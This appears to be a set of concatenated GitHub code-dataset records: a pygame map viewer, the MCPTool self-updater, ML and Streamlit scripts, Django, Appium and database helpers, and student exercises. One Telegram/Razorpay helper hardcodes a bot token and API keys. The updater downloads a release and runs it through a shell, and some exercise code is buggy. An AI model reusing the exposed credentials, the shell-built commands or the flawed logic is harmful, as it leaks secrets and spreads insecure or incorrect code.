prevcoords\r\n if e.key == pygame.K_DOWN:\r\n coords[1] = str(float(coords[1])-walky/ (2 ** (zom - 1)))\r\n try:\r\n image = get_image(zom,coords,type, point)\r\n except:\r\n coords = prevcoords\r\n if e.key == pygame.K_LEFT:\r\n coords[0] = str(float(coords[0]) - walkx/ (2 ** (zom - 1)))\r\n try:\r\n image = get_image(zom, coords,type, point)\r\n except:\r\n coords = prevcoords\r\n if e.key == pygame.K_RIGHT:\r\n coords[0] = str(float(coords[0]) + walkx/ (2 ** (zom - 1)))\r\n try:\r\n image = get_image(zom, coords,type, point)\r\n except:\r\n coords = prevcoords\r\n screen.blit(image, (0, 0))\r\n gui.render(screen)\r\n pygame.display.flip()\r\n pass\r\npygame.quit()\r\n\r\n# Удаляем за собой файл с изображением.","repo_name":"Kukushenok/YandexMapProgramm","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":9522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7538712940","text":"import os\r\nimport shutil\r\nimport subprocess\r\nimport requests\r\nimport sys\r\nimport time\r\n\r\nfrom utils.banners.banner_messages import *\r\nfrom utils.banners.print_banner import print_banner\r\nfrom utils.checks.check_termux import check_termux\r\nfrom utils.managers.updater_manager import Updater\r\n\r\n\r\ndef update_mcptool():\r\n \"\"\" Check for updates and if necessary, update it. \"\"\"\r\n\r\n u = Updater()\r\n new_script = False\r\n update_banner_name = 'update' if not check_termux() else 'update_termux'\r\n\r\n # Messages\r\n try:\r\n print_banner(update_banner_name, update_title, update_checking_updates, '', '', '', '')\r\n time.sleep(1)\r\n update = u.check_mcptool_updates()\r\n\r\n if update:\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, '', '', '')\r\n time.sleep(1)\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, '', '')\r\n time.sleep(1)\r\n\r\n if u.download('MCPTool.zip', 'https://github.com/wrrulos/MCPTool/releases/latest/download/MCPTool.zip', '../New-MCPTool'):\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_extracting, '')\r\n time.sleep(1)\r\n\r\n if u.extracting('../New-MCPTool/MCPTool.zip', '../New-MCPTool/'):\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_extracting, update_finished)\r\n time.sleep(1)\r\n shutil.copytree('../New-MCPTool/MCPTool-main', '../NewMCPTool')\r\n shutil.rmtree('../New-MCPTool')\r\n\r\n if os.path.exists('ngrok'):\r\n shutil.copy('ngrok', f'../NewMCPTool/ngrok')\r\n\r\n if os.path.exists('ngrok.exe'):\r\n shutil.copy('ngrok.exe', f'../NewMCPTool/ngrok.exe')\r\n \r\n new_script = True\r\n subprocess.run(f'cd ../NewMCPTool/ && {sys.executable} main.py', shell=True)\r\n sys.exit()\r\n\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_extracting, update_error)\r\n time.sleep(2.5)\r\n return\r\n\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_new_version, update_downloading, update_error, '')\r\n time.sleep(2.5)\r\n return\r\n\r\n print_banner(update_banner_name, update_title, update_checking_updates, update_not_found, '', '', '')\r\n time.sleep(2.5)\r\n return\r\n \r\n except requests.exceptions.InvalidURL:\r\n return\r\n \r\n except FileExistsError:\r\n return\r\n\r\n except KeyboardInterrupt:\r\n if new_script:\r\n sys.exit()\r\n\r\n return\r\n","repo_name":"wrrulos/MCPTool","sub_path":"utils/updates/mcptool_update.py","file_name":"mcptool_update.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"54"} +{"seq_id":"10272974202","text":"from configparser import ConfigParser\n\nconfig_parser = ConfigParser()\nconfig_parser.read('general_config.ini')\n\nPROJECT_NAME = config_parser.get('project', 'project_name')\nNUMBER_OF_SLICES = config_parser.getint('project', 'number_of_slices')\n\nconfig_parser.read('projects/' + PROJECT_NAME + \"/\" + PROJECT_NAME + \"_config.ini\")\n\nONNX_MODEL = config_parser.get('project', 'onnx_model')\nS3_BUCKET = config_parser.get('aws', 's3_bucket')\nPREPROCESSED_INPUT = config_parser.get('input', 'preprocessed_input')\n\nparsed_input_list = config_parser.get('project', 'input_list_start')\nINPUT_LIST_START = list(parsed_input_list.split(\"\\n\"))[1:]\n\nparsed_output_list = config_parser.get('project', 'output_list_end')\nOUTPUT_LIST_END = list(parsed_output_list.split(\"\\n\"))[1:]\n\nPROJECT_STEPS_MODULE = \"projects.\" + PROJECT_NAME + \".\" + PROJECT_NAME + \"_lambda_steps\"\n","repo_name":"adrien-glg/onnx-decomposer_aws","sub_path":"lambda_code/src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1584422088","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.metrics import mean_squared_error\n\n\ndef predictor(data):\n heera = pd.read_csv('diamonds.csv')\n heera['cut'].replace(['Ideal', 'Premium', 'Good', 'Very Good', 'Fair'], [0,1,2,3,4], inplace=True)\n heera['clarity'].replace(['IF', 'VVS1', 'VVS2', 'VS1', 'VS2', 'SI1', 'SI2', 'I1'], [0,1,2,3,4,5,6,7], inplace=True)\n heera['color'].replace(['D', 'E', 'F', 'G', 'H', 'I', 'J'], [0,1,2,3,4,5,6], inplace=True)\n # heera.drop(['Unnamed: 0.1','Unnamed: 0.1'], axis=1,inplace=True)\n X = heera[['x','y','z','carat','color','clarity','depth','table']].values\n y = heera[\"price\"].values\n X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.4,random_state=0)\n knn = KNeighborsRegressor(n_neighbors = 2)\n knn.fit(X_train,y_train)\n prediction = knn.predict(data)[0]\n return prediction","repo_name":"Mindlord-rex/diamond_deploy","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14047940035","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport subprocess\nfrom util.io.iter_raw_paths import iter_raw_paths\nfrom mne_bids import BIDSPath\n\ndef main(subs, skips) -> None:\n RAW_DIR = '../data/raw/' # where our data currently lives\n BIDS_DIR = '../data/bids/' # where we want it to live\n BAD_SUBS = ['1', '20']\n \n for (fpath, sub, task, run) in iter_raw_paths(RAW_DIR):\n\n # skip bad subjects\n if sub in BAD_SUBS:\n print(f'Bad subject {sub}, skipping')\n continue\n\n # skip if subs were listed and this sub is not included\n if bool(subs) and sub not in subs:\n continue\n\n # skip sub in skips\n if sub in skips:\n continue\n\n # skips files that already exist\n bids_path = BIDSPath(\n run = run,\n subject = sub,\n task = task,\n datatype = 'eeg',\n root = BIDS_DIR\n )\n if os.path.isfile(bids_path) and force == False:\n print(f'File {bids_path} exists, skipping {fpath}')\n continue\n \n #print(\"subprocess.check_call(\\\"sbatch ./convert_to_bids.py %s %s %s %s\\\" % (fpath, sub, task, run), shell=True)\")\n subprocess.check_call(\"sbatch ./convert_to_bids.py %s %s %s %s\" % (fpath, sub, task, run), shell=True)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run convert_to_bids.py over given subjects')\n parser.add_argument('--force',\n type = bool,\n nargs = 1,\n help = 'If true run script even if save_fpath exists.',\n default = False)\n parser.add_argument('--subs',\n type = str,\n nargs = '*',\n help = 'subjects to convert (e.g. 3 14 8), provide no argument to run over all subjects',\n default = [])\n parser.add_argument('--skips',\n type = str,\n nargs = '*',\n help = 'subjects NOT to convert (e.g. 1 9)',\n default = [])\n args = parser.parse_args()\n force = args.force\n subs = args.subs\n skips = args.skips\n print(f\"subs: {subs}, skips : {skips}\")\n if bool(subs) & bool(skips):\n raise ValueError('Cannot specify both subs and skips')\n main(subs, skips)\n","repo_name":"letitiayhho/dichotic_pitch_tracking","sub_path":"analysis/convert_all_subjects_to_bids.py","file_name":"convert_all_subjects_to_bids.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29393518478","text":"# -*- coding: utf-8 -*-\n\nimport operator\nfrom com.qa.automation.appium.api.api_new import API\nfrom com.qa.automation.appium.pages.android.common.super_page import SuperPage\nfrom com.qa.automation.appium.pages.android.ffan.square_lefu_pay_page_configs import SquareLefuPayPageConfigs as SLPPC\n\n\nclass SquareLefuPayPage(SuperPage):\n '''\n 作者 刘涛\n 首页=>乐付\n '''\n def __init__(self, testcase, driver, logger):\n super(SquareLefuPayPage, self).__init__(testcase, driver, logger)\n\n def validSelf(self):\n '''\n usage : 验证乐付买单\n '''\n API().assertElementByResourceId(self.testcase, self.driver, self.logger,\n SLPPC.resource_id_lefu_pay_title,\n 18)\n elementList = API().getElementsByContainsText(self.testcase,\n self.driver,\n self.logger,\n SLPPC.view_text_distance,\n 10)\n \n plaza_number = len(elementList)\n if plaza_number > 1:\n for i in range(1, plaza_number):\n current_plaza_distance = elementList[i].text.split(\" \")[0]\n prev_plaza_distance = elementList[i-1].text.split(\" \")[0]\n if operator.gt(prev_plaza_distance, current_plaza_distance):\n API().assertTrue(self.testcase, self.logger, False)\n\n def clickOnLefuPay(self):\n '''\n usage : 点击 \"乐付买单\"\n '''\n API().clickElementByResourceId(self.testcase, self.driver, self.logger,\n SLPPC.resource_id_lefu_pay,\n 18)\n","repo_name":"liu111xiao111/UItest","sub_path":"AutoFrameworkForAppiumPy/com/qa/automation/appium/pages/android/ffan/square_lefu_pay_page.py","file_name":"square_lefu_pay_page.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"43451799983","text":"\"\"\"\nURL configuration for library_management project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\n'''\nModule 18 - Library Management Project Assignment.\nMod date : 180623\nMod begin date : 050723, Wednesday, 07.00 am\nassignment being date : 160723, Sunday, 06.00 am \nassignment done date : 190723, Wednesday, 10.00 pm \n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\n\n'''\nmost of the templats are in the templates/lib_users and templates/library_services \n\ntemplates/lib_users has all the templates of wishlist ans books app. \n'''\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('core.urls')),\n path('auth/', include('lib_users.urls')),\n path('services/', include('library_services.urls')),\n path('wishlist/', include('wishlist.urls')),\n path('books/', include('books.urls')),\n path('wallet/', include('wallet.urls')),\n \n]\n","repo_name":"Mahboob-A/library-management-system-fresh","sub_path":"library_management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9862402127","text":"# Given a (m * n) matrix grid which is sorted in non-increasing order both row-wise and column-wise, return the number of negative numbers in grid.\n\n# Example : Input : [[4,3,2,-1],[3,2,1,-1],[1,1,-1,-2],[-1,-1,-2,-3]]\n# : Output: 8\n# Another example : Input : [[3,2],[1,0]]\n# : Output: 0\n\n\nclass Solution:\n \n def binary_search(self, row: list[int]) -> int:\n length = len(row)\n start, end = 0, length-1\n while start <= end:\n mid = (start+end) // 2\n if row[mid] < 0:\n if mid-1 >= 0 and row[mid-1] < 0:\n end = mid-1\n else:\n return length-mid\n else:\n start = mid+1\n return 0\n \n def countNegatives(self, matrix: list[list[int]]) -> int:\n count = 0\n for row in matrix:\n if row[-1] < 0:\n count += self.binary_search(row)\n return count\n\n","repo_name":"maamoun3911/Problem-Solving-Repo","sub_path":"LeetCode/problem#1351.py","file_name":"problem#1351.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10565616617","text":"import yfinance as yf\r\nimport pandas as pd\r\nimport streamlit as st\r\n\r\nlogo_image = \"logo.png\"\r\nst.sidebar.image(logo_image, width=170)\r\nst.sidebar.title(\"DCA vs LumpSump Estrategies\")\r\n\r\n# Seleccionamos las cryptos\r\ntickers = ['BTC-USD', 'ETH-USD', 'BNB-USD', 'ADA-USD', 'XRP-USD',\r\n 'SOL-USD', 'DOT-USD', 'DOGE-USD', 'AVAX-USD', 'LUNA-USD',\r\n 'UNI-USD', 'LINK-USD', 'MATIC-USD', 'LTC-USD', 'BCH-USD',\r\n 'ALGO-USD', 'ATOM-USD', 'XTZ-USD', 'FIL-USD', 'TRX-USD',\r\n 'VET-USD', 'EOS-USD', 'AAVE-USD', 'XLM-USD', 'CRO-USD',\r\n 'FTT-USD', 'MIOTA-USD', 'MKR-USD', 'XEM-USD', 'DASH-USD',\r\n 'NEO-USD', 'BTT-USD', 'XTZ-USD', 'AAVE-USD',\r\n '1INCH-USD', 'ALICE-USD', 'FARM-USD', 'GALA-USD', 'POWR-USD'] # Agrega más según sea necesario\r\n\r\n# Desarrollamos los inputs de Streamlit\r\ndropdown = st.sidebar.selectbox(\"Choose a crypto:\", tickers)\r\nstart = st.sidebar.date_input(\"Start date:\", value=pd.to_datetime(\"2021-10-31\"))\r\ninvestment = st.sidebar.number_input(\"Choose investment per month:\")\r\n\r\n# Creamos una función para obtener datos históricos\r\ndef get_data(symbol, start):\r\n data = yf.download(symbol, start=start)\r\n return data\r\n\r\n# Creamos el dataframe\r\ndf = get_data(dropdown, start)\r\n\r\n# Verificamos si el DataFrame está vacío\r\nif df.empty:\r\n st.error(\"Data not available. Please check the selected crypto symbol and start date.\")\r\nelse:\r\n st.success(\"Data downloaded successfully.\")\r\n\r\n# Creación de fechas de compra y precios de compra\r\nbuydates = pd.date_range(df.index[0], df.index[-1], freq=\"1M\")\r\nbuyprices = df[df.index.isin(buydates)].Close\r\n\r\n# Calculo de la cantidad de criptomonedas compradas\r\ncoin_amt = investment / buyprices\r\ncoin_amt_LS = investment * len(buyprices) / buyprices[0]\r\n\r\n# Calculo del portafolio en la estrategia DCA\r\ncoin_amt_sum = coin_amt.cumsum()\r\ncoin_amt_sum.name = \"coin_amt_DCA\"\r\ndf_tog = pd.concat([coin_amt_sum, df], axis=1).ffill()\r\ndf_tog[\"Portfolio_DCA\"] = df_tog.coin_amt_DCA * df_tog.Close\r\n\r\n# Calculo del rendimiento de la estrategia DCA\r\nperformance_DCA = (df_tog[\"Portfolio_DCA\"][-1] / (investment * len(buyprices)) - 1)\r\n\r\n# Calculo del portafolio en la estrategia LS\r\ndf_tog[\"coin_amt_LS\"] = coin_amt_LS\r\ndf_tog[\"Portfolio_LS\"] = df_tog.coin_amt_LS * df_tog.Close\r\n\r\n# Calculo del rendimiento en la estrategia LS\r\nperformance_LS = (df_tog[\"Portfolio_LS\"][-1] / (investment * len(buyprices)) - 1)\r\n\r\n# Display de gráficos y performance\r\nst.subheader(\"DCA performance: \" + str(round(performance_DCA * 100, 2)) + \" %\")\r\nst.line_chart(df_tog[\"Portfolio_DCA\"])\r\nst.subheader(\"LS performance: \" + str(round(performance_LS * 100, 2)) + \" %\")\r\nst.line_chart(df_tog[\"Portfolio_LS\"])","repo_name":"warthon-190399/crypto","sub_path":"hola.py","file_name":"hola.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23388418842","text":"from parameters import Args\nimport torch\nimport pickle\nimport os\nimport logging\nfrom torch.utils.data import DataLoader, Dataset, RandomSampler, SequentialSampler\nfrom transformers import (\n MODEL_WITH_LM_HEAD_MAPPING,\n WEIGHTS_NAME,\n AdamW,\n AutoConfig,\n AutoModelWithLMHead,\n AutoTokenizer,\n PreTrainedModel,\n PreTrainedTokenizer,\n get_linear_schedule_with_warmup,\n)\nlogger = logging.getLogger(__name__)\nMODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys())\nMODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)\nargs = Args()\n\n\"\"\"Let's get our data into a format that we can feed into our model using Pytorch's Dataset and Dataloader API.\nAll these methods do are convert our dataframes where we have multiple historical dialog,\ni.e., context, and a response, into a single conversation string that is separated a special token\nthat tells our model when a person is finished speaking.\n\nThese conversation strings are then tokenized using HuggingFace's awesome tokenizers into their numerical\nrepresentation that our model actual understands!\n\"\"\"\ndef construct_conv(row, tokenizer, eos = True):\n # from: https://stackoverflow.com/questions/952914/how-to-make-a-flat-list-out-of-list-of-lists\n flatten = lambda l: [item for sublist in l for item in sublist]\n conv = list(reversed([tokenizer.encode(x) + [tokenizer.eos_token_id] for x in row]))\n conv = flatten(conv)\n return conv\n\nclass ConversationDataset(Dataset):\n def __init__(self, tokenizer: PreTrainedTokenizer, args, df, block_size=512):\n\n block_size = block_size - (tokenizer.max_len - tokenizer.max_len_single_sentence)\n\n directory = args.cache_dir\n cached_features_file = os.path.join(\n directory, args.model_type + \"_cached_lm_\" + str(block_size)\n )\n\n if os.path.exists(cached_features_file) and not args.overwrite_cache:\n logger.info(\"Loading features from cached file %s\", cached_features_file)\n with open(cached_features_file, \"rb\") as handle:\n self.examples = pickle.load(handle)\n else:\n logger.info(\"Creating features from dataset file at %s\", directory)\n\n self.examples = []\n for _, row in df.iterrows():\n conv = construct_conv(row, tokenizer)\n if len(conv) > block_size: continue\n self.examples.append(conv)\n\n logger.info(\"Saving features into cached file %s\", cached_features_file)\n with open(cached_features_file, \"wb\") as handle:\n pickle.dump(self.examples, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n def __len__(self):\n return len(self.examples)\n\n def __getitem__(self, item):\n return torch.tensor(self.examples[item], dtype=torch.long)\n\ndef load_and_cache_examples(args, tokenizer, df_trn, df_val, evaluate=False):\n return ConversationDataset(tokenizer, args, df_val if evaluate else df_trn)\n","repo_name":"christinaknudsen/chatbot_research","sub_path":"norwegian_dialoGPT/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18751953735","text":"def palindrome_checker(number):\n ### This function checks from 0 to the input number and prints out all the palindromes between it. a palindrome is anything that reads the same both backward and forward e.g. Tenet, 101. Example: palindrome_checker(12) -> 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11###\n\n counter = 0\n for num in range(number):\n if str(num)[::-1] == str(num):\n print(num)\n counter += 1\n\n return counter\n\n\nprint(palindrome_checker(500))\n","repo_name":"AjibolaMatthew1/ECX30-Days_of_code","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35693987990","text":"import telegram\nfrom .models import Order\n\ndef send_telegram_message(msg):\n token = '1476623880:AAGCjhLjuSzDBym_j1zgZKIpFkMlDDAdX7Q'\n chat_id = 1426070442\n bot = telegram.Bot(token=token)\n bot.sendMessage(chat_id=chat_id, text=msg)\n\ndef razorpay_gateway(amount):\n client = razorpay.Client(auth=(\"rzp_test_BzpuQZbbNkr9jv\",\"McdtiUVkfbSjBybiNhgR12pk\"))\n order = client.order.create(dict(amount=amount, currency='$'))\n return order[\"id\"]\n\ndef init_cookie(request):\n if not 'order_id' in request.COOKIES:\n new_order = Order.objects.create()\n return new_order.id\n else:\n return request.COOKIES['order_id']","repo_name":"JerubandiNandini/website","sub_path":"coolstyles/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42742562651","text":"from django_elasticsearch_dsl import Document, fields\nfrom django_elasticsearch_dsl.registries import registry\n\nfrom companies.models import Company\n\n\n@registry.register_document\nclass CompanyIndex(Document):\n class Index:\n name = 'company'\n settings = {'number_of_shards': 1,\n 'number_of_replicas': 0}\n\n name = fields.TextField(\n attr='name',\n fields={\n 'suggest': fields.Completion(),\n }\n )\n get_absolute_url = fields.TextField(attr=\"get_absolute_url\")\n\n class Django:\n model = Company","repo_name":"cjmcfaul/servstry","sub_path":"contact_trace/documents/company_document.py","file_name":"company_document.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9124403380","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def __str__(self):\n return str(self.val)\n\n def __repr__(self):\n return str(self.val)\n\n\ndef getAllElements(root1: TreeNode, root2: TreeNode) -> List[int]:\n # iterative\n # list1 = iterInorder(root1)\n # list2 = iterInorder(root2)\n\n # recursive\n list1 = list()\n list2 = list()\n recurInorder(root1, list1)\n recurInorder(root2, list2)\n result = list()\n i, j = 0, 0\n # merge two sorted lists\n while i < len(list1) and j < len(list2):\n if list1[i].val <= list2[j].val:\n result.append(list1[i].val)\n i+=1\n else:\n result.append(list2[j].val)\n j+=1\n for rem in list1[i:]:\n result.append(rem.val)\n for rem in list2[j:]:\n result.append(rem.val)\n return result\n\n# Very slow. ~4284ms for Leetcode submission test cases\n# Little bit less memory 17.1 MB for Leetcode submission test cases\ndef iterInorder(node: TreeNode):\n if node is None:\n return []\n stack = list()\n result = list()\n stack.append(node)\n while stack:\n print(\"Stack:\", stack)\n print(\"Result:\", result)\n # dig into left-most child\n while stack[-1].left is not None and stack[-1].left not in result:\n stack.append(stack[-1].left)\n # add left-most child to result\n nodeToAppend = stack.pop()\n result.append(nodeToAppend)\n if nodeToAppend.right is not None:\n stack.append(nodeToAppend.right)\n\n return result\n\n\n# Much much faster ~400ms for Leetcode submission test cases\n# Little bit more memory 20.3 MB for Leetcode submission test cases\ndef recurInorder(node: TreeNode, orderList):\n if node is None:\n return\n recurInorder(node.left, orderList)\n orderList.append(node)\n recurInorder(node.right, orderList)\n\n\n# driver\n# example 1\nroot1 = TreeNode(2, TreeNode(1), TreeNode(4))\nroot2 = TreeNode(1, TreeNode(0), TreeNode(3))\nprint(\"Input: root1 = [2,1,4], root2 = [1,0,3]\")\nprint(\"Output:\", getAllElements(root1, root2))\n\nroot1 = TreeNode(1, None, TreeNode(8))\nroot2 = TreeNode(8, TreeNode(1), None)\nprint(\"Input: root1 = [1,None,8], root2 = [8,1]\")\nprint(\"Output:\", getAllElements(root1, root2))\n\nroot1 = TreeNode(0, TreeNode(-10), TreeNode(10))\nroot2 = TreeNode(5, TreeNode(1, TreeNode(0), TreeNode(2)), TreeNode(7))\nprint(\"Input: root1 = [0, -10, 10], root2 = [5, 1, 7, 0, 2]\")\nprint(\"Output:\", getAllElements(root1, root2))","repo_name":"minhyeong-joe/leetcode-challenge","sub_path":"Tree/AllElementsInTwoBSTs/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39360350455","text":"import psycopg2\n\nconnection = psycopg2.connect(\n host=\"postgres\",\n port=\"5432\",\n dbname=\"zach\",\n user='user',\n password='password'\n)\n\n\ndef login(name):\n try:\n cursor = connection.cursor()\n postgreSQL_select_Query = '''SELECT * FROM users WHERE name=%s;'''\n cursor.execute(postgreSQL_select_Query, (name,))\n user_record = cursor.fetchall()\n if(len(user_record) == 0):\n cursor.close()\n cursor = connection.cursor()\n insert_user_query = '''INSERT INTO users (NAME) VALUES (%s) RETURNING id'''\n cursor.execute(insert_user_query, (name,))\n user_id = cursor.fetchone()[0]\n connection.commit()\n # Creating associated sentences\n default_sentences = [\n 'Hi I saw that your was delivered. How are you enjoying it so far?',\n 'Great can you describe how you love most about ?',\n 'I\\'m sorry to hear that, what do you dislike about ?'\n ]\n insert_sms_query = '''INSERT INTO sms (TYPE, TEXT, USER_ID) VALUES (%s, %s, %s)'''\n for i, sentence in enumerate(default_sentences):\n cursor.execute(insert_sms_query, (i, sentence, user_id))\n connection.commit()\n return user_id\n\n return user_record[0][0]\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef get_sentences(user_id):\n try:\n cursor = connection.cursor()\n select_Query = '''SELECT text FROM sms WHERE user_id=%s ORDER BY type'''\n cursor.execute(select_Query, (user_id,))\n sentences = cursor.fetchall()\n return sentences\n\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef put_sentences(sentence, user_id, type_num):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"UPDATE sms SET text = %s WHERE user_id = %s AND type = %s;\"\"\"\n cursor.execute(sql_update_query, (sentence,\n int(user_id), int(type_num)))\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef create_customer(number, positive, negative):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"INSERT INTO customers (NUMBER, POSITIVE, NEGATIVE) VALUES (%s, %s, %s);\"\"\"\n cursor.execute(sql_update_query, (number, positive, negative))\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef get_customer(number):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"SELECT * FROM customers WHERE number = %s;\"\"\"\n cursor.execute(sql_update_query, (number,))\n customer_info = cursor.fetchone()\n return customer_info\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef get_response(number, isPositive):\n try:\n cursor = connection.cursor()\n select_Query = '''SELECT * FROM customers WHERE number=%s;'''\n cursor.execute(select_Query, (number,))\n response = cursor.fetchall()\n return response[-1][isPositive + 1]\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\ndef update_customer_response(number, reply):\n try:\n cursor = connection.cursor()\n sql_update_query = \"\"\"UPDATE customers SET response = %s WHERE number = %s;\"\"\"\n cursor.execute(sql_update_query, (reply, number))\n connection.commit()\n except (Exception, psycopg2.Error) as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n return 'hello'\n","repo_name":"blakespencer/Twilio-Docker","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13013398194","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom datetime import datetime\n\n\n# In[ ]:\n\n\n#Question1\n\n\n# In[3]:\n\n\ndef is_date_format_correct(date:str)->bool:\n if len(date) == 10:\n \n if date[4] == '-' and date[7] == '-' :\n if int(date[5:7]) <= 12 and int(date[8:10]) <=31:\n return True\n else:\n return False\n \n else:\n return False\n\n\n# In[ ]:\n\n\n#Question2\n\n\n# In[4]:\n\n\nfor i in range(1, 11):\n if i==6:\n continue\n else:\n print(i, end=',')\n\n\n# In[ ]:\n\n\n#Question3\n\n\n# In[7]:\n\n\n\n\ndef getPrevdate(date):\n dict = {1:'Jan', 2:'Feb', 3:'Mar', 4:'Apr', 5:'May', 6:'Jun', 7:'Jul', 8:'Aug', 9:'Sep', 10:'Oct', 11:'Nov', 12:'Dec'}\n \n if int(date[8:10]) == 1:\n if int(date[5:7]) == 1:\n '''date[5:7] - month\n date[:4] -year\n date[8:10] -day\n '''\n\n #make month = 12 ,get the value of a key\n #decrease year by 1\n \n d = 31\n y = int(date[:4])-1\n m = dict[12]\n \n final = str(d)+\" \"+str(m)+\" \"+ date[:4]\n return final\n \n elif int(date[5:7]) > 1:\n tt = int(date[5:7])-1 #month\n #make it equal 30 or 29 or 31 check condition\n \n k = int(date[5:7])\n if (k<=7 and k!=3 and k%2 !=0) or (k>7 and k%2 ==0 ):\n d = 30\n elif (k<=7 and k%2==0) or (k>7 and k%2!=0):\n d = 31\n elif k == 3 and int(date[:4])%4 != 0 :\n d = 28\n elif k == 3 and int(date[:4])%4 == 0 : #leap year take into account\n d = 29\n \n final = str(d)+\" \"+dict[tt]+\" \"+ date[:4]\n return final\n \n elif int(date[8:10]) > 1:\n d = int(date[8:10])-1\n m = dict[int(date[5:7])]\n final = str(d)+\" \"+str(m)+\" \"+ date[:4]\n return final\n \n\ndef compute_prev_date(dates_list:list):\n a = []\n for i in dates_list:\n a.append(getPrevdate(i))\n \n return a\ncompute_prev_date(['2012-03-01', '2022-12-30', '2099-12-21'])\n\n\n# In[ ]:\n\n\n#Question 4\n\n\n# In[21]:\n\n\ndef main():\n qty = None\n cost = None\n\ndef fetch_quantity():\n \"\"\"\n Returns a number, any number\n \"\"\"\n ...\n return ...\n\ndef fetch_cost():\n \"\"\"\n Returns a number, any number\n \"\"\"\n ...\n return ...\n\ndef compute_cost_per_quantity():\n\n qty = fetch_quantity()\n cost = fetch_cost()\n cost_per_quantity = cost/qty\n \n try:\n fetch_cost()\n except:\n pass\n \n #second try except\n try:\n fetch_quantity()\n cost_per_quantity = cost/qty\n \n \n except Exception as e:\n print(e)\n sys.exit(1)\n \n \n return cost_per_quantity\ncost_per_quantity = compute_cost_per_quantity()\na = 1 + 2 + cost_per_quantity\nb = 4 + 5\nprint(a+b)\n\n\n# 